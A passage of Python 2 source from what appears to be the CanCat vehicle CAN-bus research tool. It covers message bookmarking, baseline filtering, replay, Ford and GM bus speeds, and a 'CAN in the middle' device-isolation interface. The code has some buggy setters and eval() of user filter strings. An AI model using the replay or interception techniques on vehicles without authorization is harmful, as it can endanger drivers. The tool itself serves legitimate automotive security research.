mbox = self._messages.get(CMD_CAN_RECV)
if mbox == None:
msg_index = 0
else:
msg_index = len(mbox)
bkmk_index = len(self.bookmarks)
self.bookmarks.append(msg_index)
info = { 'name' : name,
'comment' : comment }
self.bookmark_info[bkmk_index] = info #should this be msg_index? benefit either way?
return bkmk_index
def getMsgIndexFromBookmark(self, bkmk_index):
return self.bookmarks[bkmk_index]
def getBookmarkFromMsgIndex(self, msg_index):
bkmk_index = self.bookmarks.index(msg_index)
return bkmk_index
def setCanBookmarkName(self, bkmk_index, name):
info = self.bookmark_info[bkmk_index]
info[name] = name
def setCanBookmarkComment(self, bkmk_index, comment):
info = self.bookmark_info[bkmk_index]
info[name] = name
def setCanBookmarkNameByMsgIndex(self, msg_index, name):
bkmk_index = self.bookmarks.index(msg_index)
info = self.bookmark_info[bkmk_index]
info[name] = name
def setCanBookmarkCommentByMsgIndex(self, msg_index, comment):
bkmk_index = self.bookmarks.index(msg_index)
info = self.bookmark_info[bkmk_index]
info[name] = name
def snapshotCanMessages(self, name=None, comment=None):
'''
Save bookmarks at the start and end of some event you are about to do
Bookmarks are named "Start_" + name and "Stop_" + name
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
start_bkmk = self.placeCanBookmark("Start_" + name, comment)
raw_input("Press Enter When Done...")
stop_bkmk = self.placeCanBookmark("Stop_" + name, comment)
def filterCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
else:
stop_bkmk = -1
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmark(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmark(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.filterCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def _getLocals(self, idx, ts, arbid, data):
return {'idx':idx, 'ts':ts, 'arbid':arbid, 'data':data}
def filterCanMsgs(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], tail=False, maxsecs=None):
'''
returns the received CAN messages between indexes "start_msg" and "stop_msg"
but only messages to ID's that *do not* appear in the the baseline indicated
by "start_baseline_msg" and "stop_baseline_msg".
for message indexes, you *will* want to look into the bookmarking subsystem!
'''
self.log("starting filtering messages...")
if stop_baseline_msg != None:
self.log("ignoring arbids from baseline...")
# get a list of baseline arbids
filter_ids = { arbid:1 for idx,ts,arbid,data in self.genCanMsgs(start_baseline_msg, stop_baseline_msg)
}.keys()
else:
filter_ids = None
self.log("filtering messages...")
if arbids != None and type(arbids) != list:
arbids = [arbids]
for idx,ts,arbid,msg in self.genCanMsgs(start_msg, stop_msg, arbids=arbids, tail=tail, maxsecs=maxsecs):
if not ((arbids != None and arbid in arbids) or arbid not in ignore and (filter_ids==None or arbid not in filter_ids)):
self.log("skipping message: (%r, %r, %r, %r)" % ((idx, ts, arbid, msg)))
continue
# advanced filters allow python code to be handed in. if any of the python code snippits result in "False" or 0, skip this message
skip = False
for advf in advfilters:
lcls = self._getLocals(idx, ts, arbid, msg)
if not eval(advf, lcls):
skip = True
if skip:
self.log("skipping message(adv): (%r, %r, %r, %r)" % ((idx, ts, arbid, msg)))
continue
yield (idx, ts, arbid, msg)
def printCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use printCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
print self.reprCanMsgsByBookmark(start_bkmk, stop_bkmk, start_baseline_bkmk, stop_baseline_bkmk, arbids, ignore, advfilters)
def reprCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None, arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use reprCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
out = []
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
else:
stop_bkmk = -1
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmark(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmark(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.reprCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def printCanMsgs(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, paginate=None, viewbits=VIEW_ALL):
data = self.reprCanMsgsLines(start_msg, stop_msg, start_bkmk, stop_bkmk, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters, pretty, viewbits=viewbits)
pidx = 0
try:
while True:
line = data.next()
lines = line.split('\n')
for thing in lines:
print thing
pidx += 1
if paginate != None and pidx % paginate == 0:
inp = raw_input("PRESS ENTER TO CONTINUE")
except StopIteration:
pass
def reprCanMsgsLines(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, tail=False, viewbits=VIEW_ALL):
# FIXME: make different stats selectable using a bitfield arg (eg. REPR_TIME_DELTA | REPR_ASCII)
'''
String representation of a set of CAN Messages.
These can be filtered by start and stop message indexes, as well as
use a baseline (defined by start/stop message indexes),
by a list of "desired" arbids as well as a list of
ignored arbids
Many functions wrap this one.
viewbits is a bitfield made up of VIEW_* options OR'd together:
... viewbits=VIEW_ASCII|VIEW_COMPARE)
'''
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
if (viewbits & VIEW_BOOKMARKS) and start_msg in self.bookmarks:
bkmk = self.bookmarks.index(start_msg)
yield ("starting from bookmark %d: '%s'" %
(bkmk,
self.bookmark_info[bkmk].get('name'))
)
if (viewbits & VIEW_BOOKMARKS) and stop_msg in self.bookmarks:
bkmk = self.bookmarks.index(stop_msg)
yield ("stoppng at bookmark %d: '%s'" %
(bkmk,
self.bookmark_info[bkmk].get('name'))
)
last_msg = None
next_bkmk = 0
next_bkmk_idx = 0
msg_count = 0
last_ts = None
tot_delta_ts = 0
counted_msgs = 0 # used for calculating averages, excluding outliers
data_delta = None
data_repeat = 0
data_similar = 0
for idx, ts, arbid, msg in self.filterCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids=arbids, ignore=ignore, advfilters=advfilters, tail=tail):
# insert bookmark names/comments in appropriate places
while next_bkmk_idx < len(self.bookmarks) and idx >= self.bookmarks[next_bkmk_idx]:
yield (self.reprBookmark(next_bkmk_idx))
next_bkmk_idx += 1
msg_count += 1
diff = []
# check data
byte_cnt_diff = 0
if (viewbits & VIEW_COMPARE) and last_msg != None:
if len(last_msg) == len(msg):
for bidx in range(len(msg)):
if last_msg[bidx] != msg[bidx]:
byte_cnt_diff += 1
if byte_cnt_diff == 0:
diff.append("REPEAT")
data_repeat += 1
elif byte_cnt_diff <=4:
diff.append("Similar")
data_similar += 1
# FIXME: make some better heuristic to identify "out of norm"
# look for ASCII data (4+ consecutive bytes)
if (viewbits & VIEW_ASCII) and hasAscii(msg):
diff.append("ASCII: %s" % repr(msg))
# calculate timestamp delta and comment if out of whack
if last_ts == None:
last_ts = ts
delta_ts = ts - last_ts
if counted_msgs:
avg_delta_ts = tot_delta_ts / counted_msgs
else:
avg_delta_ts = delta_ts
if abs(delta_ts - avg_delta_ts) <= delta_ts:
tot_delta_ts += delta_ts
counted_msgs += 1
elif (viewbits & VIEW_TS_DELTA):
diff.append("TS_delta: %.3f" % delta_ts)
if pretty:
if delta_ts >= .95:
yield ('')
msgrepr = self._reprCanMsg(idx, ts, arbid, msg, comment='\t'.join(diff))
# allow _reprCanMsg to return None to skip printing the message
if msgrepr != DONT_PRINT_THIS_MESSAGE:
yield msgrepr
last_ts = ts
last_msg = msg
if viewbits & VIEW_ENDSUM:
yield ("Total Messages: %d (repeat: %d / similar: %d)" % (msg_count, data_repeat, data_similar))
def reprCanMsgs(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, tail=False, viewbits=VIEW_ALL):
out = [x for x in self.reprCanMsgsLines(start_msg, stop_msg, start_bkmk, stop_bkmk, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters, pretty, tail, viewbits)]
return "\n".join(out)
def _reprCanMsg(self, idx, ts, arbid, msg, comment=None):
return reprCanMsg(idx, ts, arbid, msg, comment=comment)
def printCanSessions(self, arbid_list=None, advfilters=[]):
'''
Split CAN messages into Arbitration ID's and prints entire
sessions for each CAN id.
Defaults to printing by least number of messages, including all IDs
Or... provide your own list of ArbIDs in whatever order you like
'''
if arbid_list == None:
arbids = self.getArbitrationIds()
else:
arbids = [arbdata for arbdata in self.getArbitrationIds() if arbdata[1] in arbid_list]
for datalen,arbid,msgs in arbids:
print self.reprCanMsgs(arbids=[arbid], advfilters=advfilters)
cmd = raw_input("\n[N]ext, R)eplay, F)astReplay, I)nteractiveReplay, Q)uit: ").upper()
while len(cmd) and cmd != 'N':
if cmd == 'R':
self.CANreplay(arbids=[arbid], timing=TIMING_REAL)
elif cmd == 'F':
self.CANreplay(arbids=[arbid], timing=TIMING_FAST)
elif cmd == 'I':
self.CANreplay(arbids=[arbid], timing=TIMING_INTERACTIVE)
elif cmd == 'Q':
return
cmd = raw_input("\n[N]ext, R)eplay, F)astReplay, I)nteractiveReplay, Q)uit: ").upper()
print
def printBookmarks(self):
'''
Print out the list of current Bookmarks and where they sit
'''
print(self.reprBookmarks())
def printAsciiStrings(self, minbytes=4, strict=True):
'''
Search through messages looking for ASCII strings
'''
for idx, ts, arbid, msg in self.genCanMsgs():
if hasAscii(msg, minbytes=minbytes, strict=strict):
print reprCanMsg(idx, ts, arbid, msg, repr(msg))
def reprBookmarks(self):
'''
get a string representation of the bookmarks
'''
out = []
for bid in range(len(self.bookmarks)):
out.append(self.reprBookmark(bid))
return '\n'.join(out)
def reprBookmark(self, bid):
'''
get a string representation of one bookmark
'''
msgidx = self.bookmarks[bid]
info = self.bookmark_info.get(bid)
comment = info.get('comment')
if comment == None:
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s" % (bid, msgidx, info.get('name'))
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s \tcomment: %s" % (bid, msgidx, info.get('name'), info.get('comment'))
def setMaskAndFilter(self,
mask0=0,
mask1=0,
filter0=0,
filter1=0,
filter2=0,
filter3=0,
filter4=0,
filter5=0):
'''
Set the filters and masks. The mask determines which bits matter for the filter following the
below truth table:
_____________________________________________________________________________
| Mask Bit n | Filter Bit n | Arbitration ID bit n | Accept or Reject |
| 0 | X | X | Accept |
| 1 | 0 | 0 | Accept |
| 1 | 0 | 1 | Reject |
| 1 | 1 | 0 | Reject |
| 1 | 1 | 1 | Accept |
-----------------------------------------------------------------------------
There are two RX buffers. mask0 and filters 0 and 1 apply to buffer 0. mask1 and the other four filters
apply to buffer 1.
'''
msg = struct.pack('>IIIIIIII', mask0, mask1, filter0, filter1, filter2, filter3, filter4, filter5)
return self._send(CMD_SET_FILT_MASK, msg)
def clearMaskAndFilter(self):
'''
Clears all masks and filters
'''
msg = struct.pack('>IIIIIIII', 0, 0, 0, 0, 0, 0, 0, 0)
return self._send(CMD_SET_FILT_MASK, msg)
def _test_throughput(self):
'''
Use in conjuction with the M2_TEST_FW to test throughput
Connect one CanCat up to another M2 or Arduino DUE device runing the M2_TEST_FW firmware
and run this function to perform a throughput test. No other device should be connected
to allow the test to run unimpeded by other CAN traffic.
'''
self.clearCanMsgs()
self.CANxmit(0x0010, "TEST")
for i in range(6, 3, -1):
print "Time remaining: ", i*10, " seconds"
time.sleep(10)
self.CANxmit(0x810, "TEST", extflag=True)
for i in range(3, 0, -1):
print "Time remaining: ", i*10, " seconds"
time.sleep(10)
out_of_order_count = 0
msg_count = 0
prev_val = 0xFF
for foo in self.genCanMsgs(arbids=[0x00]):
msg_count += 1
prev_val += 1
if prev_val > 0xff:
prev_val = 0
if prev_val != ord(foo[3]):
out_of_order_count += 1
prev_val = ord(foo[3])
if (out_of_order_count > 0):
print "ERROR: 11 bit IDs, 1 byte messages, ", out_of_order_count, " Messages received out of order"
elif (msg_count != 181810):
print "ERROR: Received ", msg_count, " out of expected 181810 message"
else:
print "PASS: 11 bit IDs, 1 byte messages"
out_of_order_count = 0
msg_count = 0
prev_val = 0xFF
for foo in self.genCanMsgs(arbids=[0x01]):
msg_count += 1
prev_val += 1
if prev_val > 0xff:
prev_val = 0
if prev_val != ord(foo[3][0]):
out_of_order_count += 1
prev_val = ord(foo[3][0])
if (out_of_order_count > 0):
print "ERROR: 11 bit IDs, 8 byte messages, ", out_of_order_count, " Messages received out of order"
elif (msg_count != 90090):
print "ERROR: Received ", msg_count, " out of expected 90090 message"
else:
print "PASS: 11 bit IDs, 8 byte messages"
out_of_order_count = 0
msg_count = 0
prev_val = 0xFF
for foo in self.genCanMsgs(arbids=[0x800]):
msg_count += 1
prev_val += 1
if prev_val > 0xff:
prev_val = 0
if prev_val != ord(foo[3]):
out_of_order_count += 1
prev_val = ord(foo[3])
if (out_of_order_count > 0):
print "ERROR: 29 bit IDs, 1 byte messages, ", out_of_order_count, " Messages received out of order"
elif (msg_count != 133330):
print "ERROR: Received ", msg_count, " out of expected 133330 message"
else:
print "PASS: 29 bit IDs, 1 byte messages"
out_of_order_count = 0
msg_count = 0
prev_val = 0xFF
for foo in self.genCanMsgs(arbids=[0x801]):
msg_count += 1
prev_val += 1
if prev_val > 0xff:
prev_val = 0
if prev_val != ord(foo[3][0]):
out_of_order_count += 1
prev_val = ord(foo[3][0])
if (out_of_order_count > 0):
print "ERROR: 29 bit IDs, 8 byte messages, ", out_of_order_count, " Messages received out of order"
elif (msg_count != 76330):
print "ERROR: Received ", msg_count, " out of expected 76330 message"
else:
print "PASS: 29 bit IDs, 8 byte messages"
class CanControl(cmd.Cmd):
'''
Command User Interface (as if ipython wasn't enough!)
'''
def __init__(self, serialdev=serialdev, baud=baud):
cmd.Cmd.__init__(self)
self.serialdev = serialdev
self.canbuf = CanBuffer(self.serialdev, self._baud)
def getAscii(msg, minbytes=3):
'''
if strict, every character has to be clean ASCII
otherwise, look for strings of at least minbytes in length
'''
strings = []
ascii_match = 0
ascii_count = 0
startidx = None
for bidx in range(len(msg)):
byte = msg[bidx]
if 0x20 <= ord(byte) < 0x7f:
if startidx == None:
startidx = bidx
ascii_count +=1
else:
# non printable char
# if we reached the magic threshold, package it
if ascii_count >= minbytes:
strings.append(msg[startidx:bidx])
# reset counters
ascii_count = 0
startidx = None
# in case we have a string all the way to the end
if ascii_count >= minbytes:
strings.append(msg[startidx:])
return strings
def hasAscii(msg, minbytes=3, strict=False):
'''
if minbytes == -1, every character has to be clean ASCII
otherwise, look for strings of at least minbytes in length
'''
ascii_match = 0
ascii_count = 0
for byte in msg:
if 0x20 <= ord(byte) < 0x7f:
ascii_count +=1
if ascii_count >= minbytes:
ascii_match = 1
else:
if strict:
return 0
ascii_count = 0
return ascii_match
def reprCanMsg(idx, ts, arbid, data, comment=None):
#TODO: make some repr magic that spits out known ARBID's and other subdata
if comment == None:
comment = ''
return "%.8d %8.3f ID: %.3x, Len: %.2x, Data: %-18s\t%s" % (idx, ts, arbid, len(data), data.encode('hex'), comment)
class FordInterface(CanInterface):
def setCanBaudHSCAN(self):
self.setCanBaud(CAN_500KBPS)
def setCanBaudMSCAN(self):
self.setCanBaud(CAN_125KBPS)
def setCanBaudICAN(self):
self.setCanBaud(CAN_500KBPS)
class GMInterface(CanInterface):
'''
DLC port:
SW-LS-CAN - pin 1 33kbps
MS-CAN - pins 3+ and 11- 95kbps
DW-FT-CAN - pins 1+ and 9- <125kbps
HS-CAN - pins 6+ and 14- 500kbps
'''
def setCanBaudHSCAN(self):
self.setCanBaud(CAN_500KBPS)
def setCanBaudMSCAN(self):
self.setCanBaud(CAN_95KBPS)
def setCanBaudLSCAN(self):
self.setCanBaud(CAN_33KBPS)
class CanInTheMiddleInterface(CanInterface):
def __init__(self, port=serialdev, baud=baud, verbose=False, cmdhandlers=None, comment='', load_filename=None, orig_iface=None):
'''
CAN in the middle. Allows the user to determine what CAN messages are being
sent by a device by isolating a device from the CAN network and using two
Can shields on one Arduino to relay the CAN messages to each other.
Device<----->Isolation CanCat<----->Arduino<----->Vehicle CanCat<----->Vehicle
CAN SPI | SPI CAN
|
| < Serial
PC
This solves the problem of not being able to determine which device is sending
which CAN message, since CAN messages have no source information and all messages
are broadcast.
The Can shield connected to the device is referred to as the isolation CanCat.
This CanCat should be modified so that the CS SPI pin is connected to D10, rather
than the default of D9. This is accomplished by cutting a trace on the circuit
board and bridging the CS pad to the D10 pad. Seeedstudio has instructions
on their Wiki, but there shield differed slightly from my board. The CanCat
connected to the vehicle is referred to as the vehicle CanCat and should be unmodified.
'''
self.bookmarks_iso = []
self.bookmark_info_iso = {}
CanInterface.__init__(self, port=port, baud=baud, verbose=verbose, cmdhandlers=cmdhandlers, comment=comment, load_filename=load_filename, orig_iface=orig_iface)
if load_filename is None:
self.setCanMode(CMD_CAN_MODE_CITM)
def genCanMsgsIso(self, start=0, stop=None, arbids=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
CAN message generator. takes in start/stop indexes as well as a list
of desired arbids (list). Uses the isolation messages.
'''
messages = self._messages.get(CMD_ISO_RECV, [])
if stop == None:
stop = len(messages)
else:
stop = stop + 1
for idx in xrange(start, stop):
ts, msg = messages[idx]
arbid, data = self._splitCanMsg(msg)
if arbids != None and arbid not in arbids:
# allow filtering of arbids
continue
yield((idx, ts, arbid, data))
def getCanMsgCountIso(self):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
the number of CAN messages we've received on the isolation side session
'''
canmsgs = self._messages.get(CMD_ISO_RECV, [])
return len(canmsgs)
def printSessionStatsByBookmarkIso(self, start=None, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Prints session stats only for messages between two bookmarks
'''
print self.getSessionStatsByBookmarkIso(start, stop)
def printSessionStatsIso(self, start=0, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Print session stats by Arbitration ID (aka WID/PID/CANID/etc...)
between two message indexes (where they sit in the CMD_CAN_RECV
mailbox)
'''
print self.getSessionStatsIso(start, stop)
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
def getSessionStatsByBookmarkIso(self, start=None, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
returns session stats by bookmarks
'''
if start != None:
start_msg = self.getMsgIndexFromBookmarkIso(start)
else:
start_msg = 0
if stop != None:
stop_msg = self.getMsgIndexFromBookmarkIso(stop)
else:
stop_msg = self.getCanMsgCountIso()
return self.getSessionStatsIso(start=start_msg, stop=stop_msg)
def getArbitrationIdsIso(self, start=0, stop=None, reverse=False):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
return a list of Arbitration IDs
'''
arbids = {}
msg_count = 0
for idx,ts,arbid,data in self.genCanMsgsIso(start, stop):
arbmsgs = arbids.get(arbid)
if arbmsgs == None:
arbmsgs = []
arbids[arbid] = arbmsgs
arbmsgs.append((ts, data))
msg_count += 1
arbid_list = [(len(msgs), arbid, msgs) for arbid,msgs in arbids.items()]
arbid_list.sort(reverse=reverse)
return arbid_list
def getSessionStatsIso(self, start=0, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
out = []
arbid_list = self.getArbitrationIdsIso(start=start, stop=stop, reverse=True)
for datalen, arbid, msgs in arbid_list:
last = 0
high = 0
low = 0xffffffff
for ts, data in msgs:
if last == 0:
last = ts
continue
# calculate the high and low
delta = ts - last
if delta > high:
high = delta
if delta < low:
low = delta
# track repeated values (rounded to nearest .001 sec)
last = ts
if datalen > 1:
mean = (msgs[-1][0] - msgs[0][0]) / (datalen-1)
median = low + (high-low) / 2
else:
low = 0
mean = 0
median = mean
out.append("id: 0x%x\tcount: %d\ttiming:: mean: %.3f\tmedian: %.3f\thigh: %.3f\tlow: %.3f" % \
(arbid, datalen, mean, median, high, low))
msg_count = self.getCanMsgCountIso()
out.append("Total Uniq IDs: %d\nTotal Messages: %d" % (len(arbid_list), msg_count))
return '\n'.join(out)
# bookmark subsystem
def placeCanBookmark(self, name=None, comment=None):
'''
Save a named bookmark (with optional comment).
This stores the message index number from the
CMD_ISO_RECV mailbox.
This also places a bookmark in the normal CAN message
stream.
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
mbox = self._messages.get(CMD_ISO_RECV)
if mbox == None:
msg_index = 0
else:
msg_index = len(mbox)
bkmk_index = len(self.bookmarks_iso)
self.bookmarks_iso.append(msg_index)
info = { 'name' : name,
'comment' : comment }
self.bookmark_info_iso[bkmk_index] = info #should this be msg_index? benefit either way?
CanInterface.placeCanBookmark(self, name=name, comment=comment)
return bkmk_index
def getMsgIndexFromBookmarkIso(self, bkmk_index):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
return self.bookmarks_iso[bkmk_index]
def getBookmarkFromMsgIndexIso(self, msg_index):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
bkmk_index = self.bookmarks_iso.index(msg_index)
return bkmk_index
def setCanBookmarkNameIso(self, bkmk_index, name):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
info = self.bookmark_info_iso[bkmk_index]
info[name] = name
def setCanBookmarkCommentIso(self, bkmk_index, comment):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
info = self.bookmark_info_iso[bkmk_index]
info[name] = name
def setCanBookmarkNameByMsgIndexIso(self, msg_index, name):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
bkmk_index = self.bookmarks_iso.index(msg_index)
info = self.bookmark_info_iso[bkmk_index]
info[name] = name
def setCanBookmarkCommentByMsgIndexIso(self, msg_index, comment):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
bkmk_index = self.bookmarks_iso.index(msg_index)
info = self.bookmark_info_iso[bkmk_index]
info[name] = name
def snapshotCanMessagesIso(self, name=None, comment=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Save bookmarks at the start and end of some event you are about to do
Bookmarks are named "Start_" + name and "Stop_" + name
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
start_bkmk = self.placeCanBookmarkIso("Start_" + name, comment)
raw_input("Press Enter When Done...")
stop_bkmk = self.placeCanBookmarkIso("Stop_" + name, comment)
def filterCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmarkIso(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmarkIso(stop_bkmk)
else:
stop_bkmk = -1
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmarkIso(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmarkIso(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.filterCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def filterCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Iso means the second CAN bus (M2's and DUE_CAN models have two CAN interfaces)
returns the received CAN messages between indexes "start_msg" and "stop_msg"
but only messages to ID's that *do not* appear in the the baseline indicated
by "start_baseline_msg" and "stop_baseline_msg".
for message indexes, you *will* want to look into the bookmarking subsystem!
'''
self.log("starting filtering messages...")
if stop_baseline_msg != None:
self.log("ignoring arbids from baseline...")
# get a list of baseline arbids
filter_ids = { arbid:1 for ts,arbid,data in self.genCanMsgs(start_baseline_msg, stop_baseline_msg)
}.keys()
else:
filter_ids = None
self.log("filtering messages...")
if type(arbids) != list:
arbids = [arbids]
for idx,ts,arbid,msg in self.genCanMsgs(start_msg, stop_msg, arbids=arbids):
if not ((arbids != None and arbid in arbids) or arbid not in ignore and (filter_ids==None or arbid not in filter_ids)):
continue
# advanced filters allow python code to be handed in. if any of the python code snippits result in "False" or 0, skip this message
skip = False
for advf in advfilters:
lcls = self._locals(idx, ts, arbid, msg)
if not eval(advf, lcls):
skip = True
if skip:
continue
yield (idx, ts,arbid,msg)
def printCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use printCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
print self.reprCanMsgsByBookmarkIso(start_bkmk, stop_bkmk, start_baseline_bkmk, stop_baseline_bkmk, arbids, ignore, advfilters)
def reprCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None, arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
deprecated: use reprCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
out = []
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmarkIso(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmarkIso(stop_bkmk)
else:
stop_bkmk = -1
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmarkIso(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmarkIso(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.reprCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def printCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
print self.reprCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def reprCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], adfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
String representation of a set of CAN Messages.
These can be filtered by start and stop message indexes, as well as
use a baseline (defined by start/stop message indexes),
by a list of "desired" arbids as well as a list of
ignored arbids
Many functions wrap this one.
'''
out = []
if start_msg in self.bookmarks_iso:
bkmk = self.bookmarks_iso.index(start_msg)
out.append("starting from bookmark %d: '%s'" %
(bkmk,
self.bookmark_info_iso[bkmk].get('name'))
)
if stop_msg in self.bookmarks_iso:
bkmk = self.bookmarks_iso.index(stop_msg)
out.append("stoppng at bookmark %d: '%s'" %
(bkmk,
self.bookmark_info_iso[bkmk].get('name'))
)
last_msg = None
next_bkmk = 0
next_bkmk_idx = 0
msg_count = 0
last_ts = None
tot_delta_ts = 0
counted_msgs = 0 # used for calculating averages, excluding outliers
data_delta = None
data_repeat = 0
data_similar = 0
for idx, ts, arbid, msg in self.filterCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids=arbids, ignore=ignore, advfilters=advfilters):
diff = []
# insert bookmark names/comments in appropriate places
while next_bkmk_idx < len(self.bookmarks_iso) and idx >= self.bookmarks_iso[next_bkmk_idx]:
out.append(self.reprBookmarkIso(next_bkmk_idx))
next_bkmk_idx += 1
msg_count += 1
# check data
byte_cnt_diff = 0
if last_msg != None:
if len(last_msg) == len(msg):
for bidx in range(len(msg)):
if last_msg[bidx] != msg[bidx]:
byte_cnt_diff += 1
if byte_cnt_diff == 0:
diff.append("REPEAT")
data_repeat += 1
elif byte_cnt_diff <=4:
diff.append("Similar")
data_similar += 1
# FIXME: make some better heuristic to identify "out of norm"
# look for ASCII data (4+ consecutive bytes)
if hasAscii(msg):
diff.append("ASCII: %s" % repr(msg))
# calculate timestamp delta and comment if out of whack
if last_ts == None:
last_ts = ts
delta_ts = ts - last_ts
if counted_msgs:
avg_delta_ts = tot_delta_ts / counted_msgs
else:
avg_delta_ts = delta_ts
if abs(delta_ts - avg_delta_ts) <= delta_ts:
tot_delta_ts += delta_ts
counted_msgs += 1
else:
diff.append("TS_delta: %.3f" % delta_ts)
out.append(reprCanMsg(idx, ts, arbid, msg, comment='\t'.join(diff)))
last_ts = ts
last_msg = msg
